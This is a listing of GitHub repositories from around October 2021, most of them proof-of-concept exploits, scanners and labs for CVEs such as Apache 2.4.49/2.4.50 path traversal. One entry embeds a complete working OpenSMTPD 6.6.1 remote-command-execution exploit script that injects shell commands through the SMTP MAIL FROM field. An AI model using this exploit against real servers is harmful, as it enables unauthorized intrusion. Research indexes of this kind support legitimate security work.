
**Poc CVE-2021-42013 - Apache 2.4.50 without CGI** : [TheLastVvV/CVE-2021-42013](https://github.com/TheLastVvV/CVE-2021-42013) create time: 2021-10-23T21:58:44Z

**Poc CVE 2021-41773 - Apache 2.4.49 with CGI enabled** : [TheLastVvV/CVE-2021-41773](https://github.com/TheLastVvV/CVE-2021-41773) create time: 2021-10-23T21:37:25Z

**no description** : [engkikarnando/cvengki.html-2021](https://github.com/engkikarnando/cvengki.html-2021) create time: 2021-10-23T03:01:42Z

**SolarWinds Orion Platform ActionPluginBaseView 反序列化RCE** : [Y4er/CVE-2021-35215](https://github.com/Y4er/CVE-2021-35215) create time: 2021-10-23T01:35:42Z

**no description** : [aravinddathd/CVE-2018-1123](https://github.com/aravinddathd/CVE-2018-1123) create time: 2021-10-22T19:36:29Z

**PoC for CVE-2021-2471 - XXE in MySQL Connector/J** : [DrunkenShells/CVE-2021-2471](https://github.com/DrunkenShells/CVE-2021-2471) create time: 2021-10-22T17:59:16Z

**no description** : [cckuailong/CVE-2021-2471](https://github.com/cckuailong/CVE-2021-2471) create time: 2021-10-22T15:36:38Z

**no description** : [BabyTeam1024/CVE-2021-41773](https://github.com/BabyTeam1024/CVE-2021-41773) create time: 2021-10-22T15:12:12Z

**h2-jdbc(https://github.com/h2database/h2database/issues/3195) & mysql-jdbc(CVE-2021-2471) SQLXML XXE vulnerability reduce.** : [SecCoder-Security-Lab/jdbc-sqlxml-xxe](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe) create time: 2021-10-22T07:14:25Z

**no description** : [scopion/CVE-2017-3241](https://github.com/scopion/CVE-2017-3241) create time: 2021-10-22T03:39:01Z

**nxlog ubuntu CVE-2020-35488** : [githubfoam/nxlog-ubuntu-githubactions](https://github.com/githubfoam/nxlog-ubuntu-githubactions) create time: 2021-10-12T18:25:17Z

**A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details.** : [XDLDCG/bash-tls-reneg-attack](https://github.com/XDLDCG/bash-tls-reneg-attack) create time: 2019-08-28T02:17:27Z

**no description** : [ItsFadinG/CVE-2018-11235](https://github.com/ItsFadinG/CVE-2018-11235) create time: 2021-10-21T12:12:16Z

**For IS713 Project** : [sinjeanmin/cvedetails_2020](https://github.com/sinjeanmin/cvedetails_2020) create time: 2021-10-21T11:31:24Z

**CVE 2021 40444 Windows Exploit services.dll** : [kal1gh0st/CVE-2021-40444_CAB_archives](https://github.com/kal1gh0st/CVE-2021-40444_CAB_archives) create time: 2021-09-24T10:59:34Z

**THIS IS NOT AN ORIGINAL EXPLOIT. THIS IS AN AUDITED VERSION FOR A THM BOX** : [Cinnamon1212/Modified-CVE-2020-10915-MsfModule](https://github.com/Cinnamon1212/Modified-CVE-2020-10915-MsfModule) create time: 2021-10-20T20:27:42Z

**no description** : [BincangSiber/CVE-2021-42013](https://github.com/BincangSiber/CVE-2021-42013) create time: 2021-10-20T15:32:39Z

**no description** : [BincangSiber/CVE-2021-41773](https://github.com/BincangSiber/CVE-2021-41773) create time: 2021-10-20T14:41:15Z

**no description** : [ItsFadinG/CVE-2018-6574](https://github.com/ItsFadinG/CVE-2018-6574) create time: 2021-10-20T12:04:56Z

**no description** : [robotserves/CVE-2021-40449-Exploit](https://github.com/robotserves/CVE-2021-40449-Exploit) create time: 2021-10-20T12:04:52Z

**no description** : [qwutony/CVE-2021-41773](https://github.com/qwutony/CVE-2021-41773) create time: 2021-10-20T11:27:12Z

**windows 10 14393 LPE** : [KaLendsi/CVE-2021-40449-Exploit](https://github.com/KaLendsi/CVE-2021-40449-Exploit) create time: 2021-10-20T09:24:36Z

**Just a simple CVE-2021-31166 exploit tool** : [ConMiko/CVE-2021-31166-exploit](https://github.com/ConMiko/CVE-2021-31166-exploit) create time: 2021-10-20T07:37:46Z

**CVE-2021-3156 exploit** : [Bubleh21/CVE-2021-3156](https://github.com/Bubleh21/CVE-2021-3156) create time: 2021-10-20T07:34:53Z

**CVE-2021-41773 Docker lab** : [cloudbyteelias/CVE-2021-41773](https://github.com/cloudbyteelias/CVE-2021-41773) create time: 2021-10-20T01:20:21Z

**CVE-2019-3980 exploit written in win32/c++ (openssl dependency). Port of https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py** : [Barbarisch/CVE-2019-3980](https://github.com/Barbarisch/CVE-2019-3980) create time: 2021-10-19T18:28:47Z

**此项目为复现CVE-2020-13933 shiro漏洞所搭建的简易springboot+shiro项目** : [kunFeng1998/CVE-2020-13933Project](https://github.com/kunFeng1998/CVE-2020-13933Project) create time: 2021-10-19T09:33:46Z

**If an authenticated user who is able to edit Wordpress PHP code in any kind, clicks a malicious link, PHP code can be edited through XSS in Formidable Forms 4.09.04.** : [S1lkys/CVE-2021-24884](https://github.com/S1lkys/CVE-2021-24884) create time: 2021-10-18T16:37:08Z

**Drupal remote code execution vulnerabilty** : [Vulnmachines/drupal-cve-2019-6339](https://github.com/Vulnmachines/drupal-cve-2019-6339) create time: 2021-10-19T06:59:29Z

**no description** : [bibo318/kali-CVE-2019-0708-lab](https://github.com/bibo318/kali-CVE-2019-0708-lab) create time: 2021-10-19T06:49:45Z

**no description** : [xiaojiangxl/CVE-2021-21234](https://github.com/xiaojiangxl/CVE-2021-21234) create time: 2021-10-19T01:08:48Z

**A small PoC for the recent RCE found in the Goahead Webserver prior to version 5.1.5.** : [kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-](https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-) create time: 2021-10-12T06:21:02Z

**Dahua IPC/VTH/VTO devices auth bypass exploit** : [dorkerdevil/CVE-2021-33044](https://github.com/dorkerdevil/CVE-2021-33044) create time: 2021-10-18T16:02:41Z

**no description** : [vulf/CVE-2021-41773_42013](https://github.com/vulf/CVE-2021-41773_42013) create time: 2021-10-18T12:01:58Z

**no description** : [huydoppa/CVE-2018-15133](https://github.com/huydoppa/CVE-2018-15133) create time: 2021-10-18T09:23:05Z

**Exploit For CVE-2019-17662** : [rajendrakumaryadav/CVE-2019-17662-Exploit](https://github.com/rajendrakumaryadav/CVE-2019-17662-Exploit) create time: 2021-10-18T08:26:47Z

**Exploit For CVE-2019-17662** : [acm-iem/CVE-2019-17662-Exploit](https://github.com/acm-iem/CVE-2019-17662-Exploit) create time: 2021-10-18T06:51:06Z

**CVE-2021-36260** : [rabbitsafe/CVE-2021-36260](https://github.com/rabbitsafe/CVE-2021-36260) create time: 2021-10-18T06:40:48Z

**no description** : [xiaojiangxl/CVE-2021-40438](https://github.com/xiaojiangxl/CVE-2021-40438) create time: 2021-10-18T02:02:43Z

**Exploit for CVE-2019-17662** : [acm-iem/CVE-2019-17662-Exploit](https://github.com/acm-iem/CVE-2019-17662-Exploit) create time: 2021-10-17T20:38:22Z

**no description** : [acm-iem/CVE-2019-17662](https://github.com/acm-iem/CVE-2019-17662) create time: 2021-10-17T16:30:29Z

**Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)** : [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare) create time: 2021-09-26T13:53:10Z

**EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: / Platform: LINUX Date: 2020-01-30 Vulnerable App: # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https://www.openwall.com/lists/oss-security/2020/01/28/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!/usr/local/bin/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} '.format(sys.argv[0])) print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] OpenSMTPD detected') s.send(b'HELO x\r\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(b'RCPT TO:\r\n') s.recv(1024) s.send(b'DATA\r\n') s.recv(1024) s.send(b'\r\nxxx\r\n.\r\n') s.recv(1024) s.send(b'QUIT\r\n') s.recv(1024) print('[*] Done')** : [Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit](https://github.com/Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit) create time: 2021-10-16T22:10:47Z

**EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: / Platform: LINUX Date: 2020-01-30** : [Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution](https://github.com/Sergio928/OpenSMTPD-6.6.1---Remote-Code-Execution) create time: 2021-10-16T21:52:47Z

**ES File Explorer v4.1.9.7.4 Open port vulnerability exploit. CVE-2019-6447** : [febinrev/CVE-2019-6447-ESfile-explorer-exploit](https://github.com/febinrev/CVE-2019-6447-ESfile-explorer-exploit) create time: 2021-10-07T13:41:06Z

**CVE-2020-10770 for nuclei** : [CrowX500x0/CVE-2020-10770](https://github.com/CrowX500x0/CVE-2020-10770) create time: 2021-10-16T15:54:38Z

**PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)** : [ollypwn/CallbackHell](https://github.com/ollypwn/CallbackHell) create time: 2021-10-16T16:17:44Z

**Simple honeypot for CVE-2021-41773 vulnerability** : [lopqto/CVE-2021-41773_Honeypot](https://github.com/lopqto/CVE-2021-41773_Honeypot) create time: 2021-10-16T15:30:34Z

**TIC4301 Project - CVE-2021-40444** : [factionsypho/TIC4301_Project](https://github.com/factionsypho/TIC4301_Project) create time: 2021-10-16T07:07:26Z

**no description** : [anonsecteaminc/CVE-2020-5902-Scanner](https://github.com/anonsecteaminc/CVE-2020-5902-Scanner) create time: 2021-10-16T02:10:03Z

**CVE-2021-41773-PoC** : [anonsecteaminc/CVE-2021-41773-PoC](https://github.com/anonsecteaminc/CVE-2021-41773-PoC) create time: 2021-10-16T01:32:17Z

**Little thing put together quickly to demonstrate this CVE** : [0xAJ2K/CVE-2020-11022-CVE-2020-11023](https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023) create time: 2021-10-16T01:10:33Z

**The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49.** : [LudovicPatho/CVE-2021-41773](https://github.com/LudovicPatho/CVE-2021-41773) create time: 2021-10-15T21:38:48Z

**IBM WebSphere deserialization of untrusted data - IBM WebSphere 7,8,8.5,9** : [BitWrecker/CVE-2016-5983](https://github.com/BitWrecker/CVE-2016-5983) create time: 2021-10-15T21:09:15Z

**Using curl to exploit CVE-2019-11447** : [iainr/CuteNewsRCE](https://github.com/iainr/CuteNewsRCE) create time: 2021-10-15T20:15:41Z

**no description** : [shiomiyan/CVE-2021-41773](https://github.com/shiomiyan/CVE-2021-41773) create time: 2021-10-07T15:00:55Z

**no description** : [brydennik69/First-CVE2021](https://github.com/brydennik69/First-CVE2021) create time: 2021-10-15T18:41:36Z

**In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.** : [adubaldo/CVE-2021-42071](https://github.com/adubaldo/CVE-2021-42071) create time: 2021-10-15T16:08:16Z

**no description** : [chinaYozz/CVE-2020-25078](https://github.com/chinaYozz/CVE-2020-25078) create time: 2021-10-15T13:03:29Z

**apache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013)** : [theLSA/apache-httpd-path-traversal-checker](https://github.com/theLSA/apache-httpd-path-traversal-checker) create time: 2021-10-15T10:38:44Z

**Exploit for remote command execution in Golang go get command.** : [Devang-Solanki/CVE-2018-6574](https://github.com/Devang-Solanki/CVE-2018-6574) create time: 2021-10-15T08:02:02Z

**no description** : [koharin/CVE-2020-0041](https://github.com/koharin/CVE-2020-0041) create time: 2021-09-10T08:01:54Z

**no description** : [FitTerminator/PS4-CVE-202130858](https://github.com/FitTerminator/PS4-CVE-202130858) create time: 2021-10-14T20:30:11Z

**Docker container lab to play/learn with CVE-2021-42013** : [twseptian/CVE-2021-42013-Lab](https://github.com/twseptian/CVE-2021-42013-Lab) create time: 2021-10-14T18:00:48Z

**no description** : [dorkerdevil/CVE-2021-36749](https://github.com/dorkerdevil/CVE-2021-36749) create time: 2021-10-14T17:30:55Z

**A simple Python proof of concept for CVE-2021-38295.** : [ProfessionallyEvil/CVE-2021-38295-PoC](https://github.com/ProfessionallyEvil/CVE-2021-38295-PoC) create time: 2021-10-14T15:45:21Z

**no description** : [zomy22/CVE-2020-16846-Saltstack-Salt-API](https://github.com/zomy22/CVE-2020-16846-Saltstack-Salt-API) create time: 2021-10-14T10:09:48Z

**My take on CVE-2021-30858 for ps4 8.xx** : [PeterMxx/ps4_8.00_vuln_poc](https://github.com/PeterMxx/ps4_8.00_vuln_poc) create time: 2021-10-14T09:24:51Z

**Hi there! Thanks for testing out my first ever Github repository & implementation of an iOS webkit exploit! So you are aware: I did not discover this exploit, and I also did not write most of this. So far, I have started off with modifying existing code to begin to learn how this all works. Let me know how your experience went!** : [FitTerminator/CVE-202130858](https://github.com/FitTerminator/CVE-202130858) create time: 2021-10-14T04:28:42Z

**Apache Druid 任意文件读取** : [BrucessKING/CVE-2021-36749](https://github.com/BrucessKING/CVE-2021-36749) create time: 2021-10-14T03:47:02Z

**Testing CVE-2021-30858 Rev3** : [KameleonReloaded/CVEREV3](https://github.com/KameleonReloaded/CVEREV3) create time: 2021-10-14T01:51:39Z

**VERY simple code to check if the browser is compatible or not** : [Nazky/PS4CVE202130858](https://github.com/Nazky/PS4CVE202130858) create time: 2021-10-13T20:15:19Z

**no description** : [musergi/CVE-2021-3156](https://github.com/musergi/CVE-2021-3156) create time: 2021-10-13T17:43:51Z

**Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519** : [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal) create time: 2021-10-13T17:03:56Z

**no description** : [Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287](https://github.com/Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287) create time: 2021-10-13T08:35:57Z

**Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)** : [ColdFusionX/Keycloak-12.0.1-CVE-2020-10770](https://github.com/ColdFusionX/Keycloak-12.0.1-CVE-2020-10770) create time: 2021-10-13T08:40:33Z

**no description** : [IBUILI/CVE-2021-41730](https://github.com/IBUILI/CVE-2021-41730) create time: 2021-10-13T02:12:11Z

**PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only)** : [ZeusBox/CVE-2021-37980](https://github.com/ZeusBox/CVE-2021-37980) create time: 2021-10-12T19:14:29Z

**no description** : [hoavt184/CVE-2021-22941](https://github.com/hoavt184/CVE-2021-22941) create time: 2021-10-12T14:52:38Z

**Proof of concept for Strapi CVE-2019-18818 - Unauthenticated Password Reset Vulnerability** : [Shadawks/Strapi-CVE-2019-1881](https://github.com/Shadawks/Strapi-CVE-2019-1881) create time: 2021-10-12T14:16:17Z

**because people want to test it** : [Nazky/PS4CVE20211879](https://github.com/Nazky/PS4CVE20211879) create time: 2021-10-12T12:47:14Z

**CVE-2021-42261** : [jet-pentest/CVE-2021-42261](https://github.com/jet-pentest/CVE-2021-42261) create time: 2021-10-12T10:50:01Z

**Atlassian Jira Server/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086)** : [ColdFusionX/CVE-2021-26086](https://github.com/ColdFusionX/CVE-2021-26086) create time: 2021-10-05T14:09:52Z

**Windows Etw LPE** : [KaLendsi/CVE-2021-34486](https://github.com/KaLendsi/CVE-2021-34486) create time: 2021-10-12T03:50:44Z

**Path Traversal and RCE in Apache HTTP Server 2.4.49** : [0xAlmighty/CVE-2021-41773-PoC](https://github.com/0xAlmighty/CVE-2021-41773-PoC) create time: 2021-10-12T00:51:32Z

**Unauthenticated Remote Code Execution at Woody Ad Snippets (PoC)** : [oxctdev/CVE-2019-15858](https://github.com/oxctdev/CVE-2019-15858) create time: 2021-10-11T21:37:06Z

**Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authentication.** : [bp2008/DahuaLoginBypass](https://github.com/bp2008/DahuaLoginBypass) create time: 2021-10-11T22:08:47Z

**Currently on a purple team project performing the Printernightmare also known as CVE 2021-1675: A vulnerability that allows an attacker with low access privileges to use a malicious DLL file to escalate privilege. Threat actors can only take advantage of the vulnerability if they have direct access to the vulnerable system, so Microsoft categorized it as low-risk. The June 2021 Security Updates included a successful patch for CVE 2021-1675. remote code execution -cvs-2021-34527- A remote code execution (RCE) vulnerability that allows threat actors to remotely inject DLLs** : [Sirius-RJ/FullstackAcademy-Printernightmare-writeup-2105-E.C.A.R.](https://github.com/Sirius-RJ/FullstackAcademy-Printernightmare-writeup-2105-E.C.A.R.) create time: 2021-10-11T21:46:24Z

**C-Ark Credential Decoder for #CVE-2021-31796** : [unmanarc/CACredDecoder](https://github.com/unmanarc/CACredDecoder) create time: 2017-04-19T06:01:08Z

**no description** : [dongpohezui/cve-2021-33045](https://github.com/dongpohezui/cve-2021-33045) create time: 2021-10-11T15:11:48Z

**no description** : [rasyidfox/CVE-2019-18818](https://github.com/rasyidfox/CVE-2019-18818) create time: 2021-10-11T05:24:04Z

**Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE** : [scarmandef/CVE-2021-41773](https://github.com/scarmandef/CVE-2021-41773) create time: 2021-10-11T03:03:08Z

**CVE-2021-41773 Grabber** : [apapedulimu/Apachuk](https://github.com/apapedulimu/Apachuk) create time: 2021-10-11T00:57:27Z

**no description** : [cgddgc/CVE-2021-41773-42013](https://github.com/cgddgc/CVE-2021-41773-42013) create time: 2021-10-10T10:09:52Z

**no description** : [Tuz-Wwsd/CVE-2019-15107_detection](https://github.com/Tuz-Wwsd/CVE-2019-15107_detection) create time: 2021-10-10T09:05:55Z

**CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited** : [twseptian/CVE-2021-41773](https://github.com/twseptian/CVE-2021-41773) create time: 2021-10-07T11:55:10Z

**mass scan for apache 2.4.49/2.4.50** : [meicookies/cve-2021-41773_2021-42013](https://github.com/meicookies/cve-2021-41773_2021-42013) create time: 2021-10-09T16:28:06Z

**Apache 2.4.49 Path Traversal Vulnerability Checker** : [EagleTube/CVE-2021-41773](https://github.com/EagleTube/CVE-2021-41773) create time: 2021-10-09T16:07:57Z

**cve-2021-41773 即 cve-2021-42013 批量检测脚本** : [5gstudent/cve-2021-41773-and-cve-2021-42013](https://github.com/5gstudent/cve-2021-41773-and-cve-2021-42013) create time: 2021-10-09T11:33:56Z

**PoC for CVE-2021-3129 (Laravel)** : [knqyf263/CVE-2021-3129](https://github.com/knqyf263/CVE-2021-3129) create time: 2021-10-01T09:09:38Z

**no description** : [Murasame-nc/CVE-2020-0796-LPE-POC](https://github.com/Murasame-nc/CVE-2020-0796-LPE-POC) create time: 2021-10-09T08:19:55Z

**Remote Code Execution POC for CVE-2020-0796** : [oxctdev/CVE-2020-0796](https://github.com/oxctdev/CVE-2020-0796) create time: 2021-10-09T04:52:55Z

**CVE-2021-41773 CVE-2021-42013漏洞批量检测工具** : [inbug-team/CVE-2021-41773_CVE-2021-42013](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013) create time: 2021-10-09T03:32:18Z

**no description** : [KAB8345/CVE-2021-41773](https://github.com/KAB8345/CVE-2021-41773) create time: 2021-10-09T03:21:41Z

**Apache CVE-2021-41773/2021-42013 Mass Vulnerability Checker** : [im-hanzou/apachrot](https://github.com/im-hanzou/apachrot) create time: 2021-10-09T02:12:39Z

**no description** : [Tau-hub/Firefox-CVE-2016-9079](https://github.com/Tau-hub/Firefox-CVE-2016-9079) create time: 2021-10-08T21:44:13Z

**POC** : [superzerosec/CVE-2021-41773](https://github.com/superzerosec/CVE-2021-41773) create time: 2021-10-08T15:40:41Z

**ITSM_Broken_control** : [ArianeBlow/CVE-2021-27513](https://github.com/ArianeBlow/CVE-2021-27513) create time: 2021-10-08T13:11:00Z

**A Python script to check if an Apache web server is vulnerable to CVE-2021-41773** : [b1tsec/CVE-2021-41773](https://github.com/b1tsec/CVE-2021-41773) create time: 2021-10-08T08:32:51Z

**A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public** : [HightechSec/scarce-apache2](https://github.com/HightechSec/scarce-apache2) create time: 2021-10-07T01:31:13Z

**Fast python tool to test apache path traversal CVE-2021-41773 in a List of url** : [zeronine9/CVE-2021-41773](https://github.com/zeronine9/CVE-2021-41773) create time: 2021-10-08T07:24:49Z

**no description** : [ComdeyOverFlow/CVE-2021-41773](https://github.com/ComdeyOverFlow/CVE-2021-41773) create time: 2021-10-07T12:30:13Z

**I have come-up with a POC for Payara Micro Community 5.2021.6 - Directory Traversal, Please refer above reference field.** : [Net-hunter121/CVE-2021-41381](https://github.com/Net-hunter121/CVE-2021-41381) create time: 2021-10-08T05:52:20Z

**Apache 2.4.50 Path traversal vulnerability** : [Vulnmachines/cve-2021-42013](https://github.com/Vulnmachines/cve-2021-42013) create time: 2021-10-08T05:44:54Z

**Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code** : [JoyGhoshs/CVE-2021-40870](https://github.com/JoyGhoshs/CVE-2021-40870) create time: 2021-10-08T05:35:40Z

**Exploit for Apache 2.4.49** : [0xRar/CVE-2021-41773](https://github.com/0xRar/CVE-2021-41773) create time: 2021-10-08T04:26:31Z

**no description** : [pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt) create time: 2021-10-08T04:43:27Z

**CVE-2021-41773, poc, exploit** : [vinhjaxt/CVE-2021-41773-exploit](https://github.com/vinhjaxt/CVE-2021-41773-exploit) create time: 2021-10-07T08:10:00Z

**-H 192.168.1.1-192.168.5.255** : [einzbernnn/CVE-2020-1938Scan](https://github.com/einzbernnn/CVE-2020-1938Scan) create time: 2021-10-08T04:20:43Z

**Apache HTTPd (2.4.49) – Local File Disclosure (LFI)** : [oxctdev/CVE-2021-41773](https://github.com/oxctdev/CVE-2021-41773) create time: 2021-10-07T00:14:40Z

**This a simple poc for Apache/2.4.49 Path Traversal Vulnerability** : [shellreaper/CVE-2021-41773](https://github.com/shellreaper/CVE-2021-41773) create time: 2021-10-08T01:13:33Z

**Docker container lab to play/learn with CVE-2021-41773** : [htrgouvea/lab-cve-2021-41773](https://github.com/htrgouvea/lab-cve-2021-41773) create time: 2021-10-07T23:38:36Z

**CVE-2021-26084 - Confluence Server Webwork OGNL injection** : [oxctdev/CVE-2021-26084](https://github.com/oxctdev/CVE-2021-26084) create time: 2021-10-06T23:24:24Z

**Mass exploitation CVE-2021-41773 and auto detect possible RCE** : [Sakura-nee/CVE-2021-41773](https://github.com/Sakura-nee/CVE-2021-41773) create time: 2021-10-07T21:37:50Z

**Aviatrix allows an authenticated user to execute arbitrary code** : [oxctdev/CVE-2021-40870](https://github.com/oxctdev/CVE-2021-40870) create time: 2021-10-07T21:34:00Z

**MASS CVE-2021-41773** : [justakazh/mass_cve-2021-41773](https://github.com/justakazh/mass_cve-2021-41773) create time: 2021-10-07T15:13:18Z

**Exploit with integrated shodan search** : [andrea-mattioli/apache-exploit-CVE-2021-42013](https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013) create time: 2021-10-07T18:31:29Z

**no description** : [0xAgun/CVE-2021-40870](https://github.com/0xAgun/CVE-2021-40870) create time: 2021-10-07T17:19:12Z

**Simple script realizado en bash, para revisión de múltiples hosts para CVE-2021-41773 (Apache)** : [jheeree/Simple-CVE-2021-41773-checker](https://github.com/jheeree/Simple-CVE-2021-41773-checker) create time: 2021-10-06T23:32:30Z

**no description** : [LetouRaphael/Poc-CVE-2021-41773](https://github.com/LetouRaphael/Poc-CVE-2021-41773) create time: 2021-10-07T16:19:45Z

**Apache 2.4.49** : [AssassinUKG/CVE-2021-41773](https://github.com/AssassinUKG/CVE-2021-41773) create time: 2021-10-06T21:37:18Z

**exploit to CVE-2021-41773** : [n3k00n3/CVE-2021-41773](https://github.com/n3k00n3/CVE-2021-41773) create time: 2021-10-06T19:39:25Z

**Denial of Service tool for Wowza Streaming Engine <= 4.8.11+5 - Uncontrolled Resource Consumption (CVE-2021-35492)** : [N4nj0/CVE-2021-35492](https://github.com/N4nj0/CVE-2021-35492) create time: 2021-10-06T20:53:00Z

**no description** : [zeroc00I/CVE-2021-26085](https://github.com/zeroc00I/CVE-2021-26085) create time: 2021-10-06T20:03:22Z

**no description** : [fnatalucci/CVE-2021-41773-RCE](https://github.com/fnatalucci/CVE-2021-41773-RCE) create time: 2021-10-06T19:50:33Z

**Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 (Path Traversal in Apache 2.4.49)** : [Zeop-CyberSec/apache_normalize_path](https://github.com/Zeop-CyberSec/apache_normalize_path) create time: 2021-10-06T14:58:27Z

**Local and Remote scan for shellshock vulnerability for Bash versions lower than 4.3.* [CVE-2014-6271].** : [0bfxgh0st/ShellShock](https://github.com/0bfxgh0st/ShellShock) create time: 2021-10-06T15:20:40Z

**no description** : [r00tVen0m/CVE-2021-41773](https://github.com/r00tVen0m/CVE-2021-41773) create time: 2021-10-06T16:15:21Z

**no description** : [BlueTeamSteve/CVE-2021-41773](https://github.com/BlueTeamSteve/CVE-2021-41773) create time: 2021-10-06T14:47:23Z

**no description** : [ranggaggngntt/CVE-2021-41773](https://github.com/ranggaggngntt/CVE-2021-41773) create time: 2021-10-06T14:36:05Z

**CVE-2021-41773 的复现** : [1nhann/CVE-2021-41773](https://github.com/1nhann/CVE-2021-41773) create time: 2021-10-06T14:17:31Z

**no description** : [mohwahyudi/cve-2021-41773](https://github.com/mohwahyudi/cve-2021-41773) create time: 2021-10-06T14:12:07Z

**Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)** : [jbovet/CVE-2021-41773](https://github.com/jbovet/CVE-2021-41773) create time: 2021-10-06T13:39:57Z

**PoC of CVE-2021-35296 - PTCL Modem HG150-Ub** : [afaq1337/CVE-2021-35296](https://github.com/afaq1337/CVE-2021-35296) create time: 2021-09-30T18:18:27Z

**Sample exploits for Zephyr CVE-2021-3625** : [szymonh/zephyr_cve-2021-3625](https://github.com/szymonh/zephyr_cve-2021-3625) create time: 2021-10-06T12:47:24Z

**no description** : [nisdn/CVE-2021-40978](https://github.com/nisdn/CVE-2021-40978) create time: 2021-10-04T01:36:17Z

**Path Traversal vulnerability in Apache 2.4.49** : [PentesterGuruji/CVE-2021-41773](https://github.com/PentesterGuruji/CVE-2021-41773) create time: 2021-10-06T10:04:22Z

**CVE-2021-41773 playground** : [blasty/CVE-2021-41773](https://github.com/blasty/CVE-2021-41773) create time: 2021-10-06T07:17:05Z

**CVE-2021-41773** : [creadpag/CVE-2021-41773-POC](https://github.com/creadpag/CVE-2021-41773-POC) create time: 2021-10-06T05:34:48Z

**CVE-2021-41773.nse** : [TishcaTpx/cve-2021-41773-nse](https://github.com/TishcaTpx/cve-2021-41773-nse) create time: 2021-10-06T05:22:42Z

**CVE-2021-41773.nse** : [creadpag/cve-2021-41773-nse](https://github.com/creadpag/cve-2021-41773-nse) create time: 2021-10-06T05:12:07Z

**CVE-2018-11235** : [bstanley754/demo-ptlab-2](https://github.com/bstanley754/demo-ptlab-2) create time: 2021-10-06T04:16:14Z

**no description** : [hh-hunter/cve-2021-24499](https://github.com/hh-hunter/cve-2021-24499) create time: 2021-10-06T03:07:31Z

**PoC for CVE-2021-41773 with docker to demonstrate** : [habibiefaried/CVE-2021-41773-PoC](https://github.com/habibiefaried/CVE-2021-41773-PoC) create time: 2021-10-06T03:01:41Z

**CVE-2021-41773 POC with Docker** : [itsecurityco/CVE-2021-41773](https://github.com/itsecurityco/CVE-2021-41773) create time: 2021-10-06T02:30:40Z

**no description** : [lsass-exe/CVE-2021-41773](https://github.com/lsass-exe/CVE-2021-41773) create time: 2021-10-06T02:28:41Z

**no description** : [lorddemon/CVE-2021-41773-PoC](https://github.com/lorddemon/CVE-2021-41773-PoC) create time: 2021-10-05T23:53:48Z

**bypass all stages of the password reset flow** : [oxctdev/CVE-2021-27651](https://github.com/oxctdev/CVE-2021-27651) create time: 2021-10-05T23:33:50Z

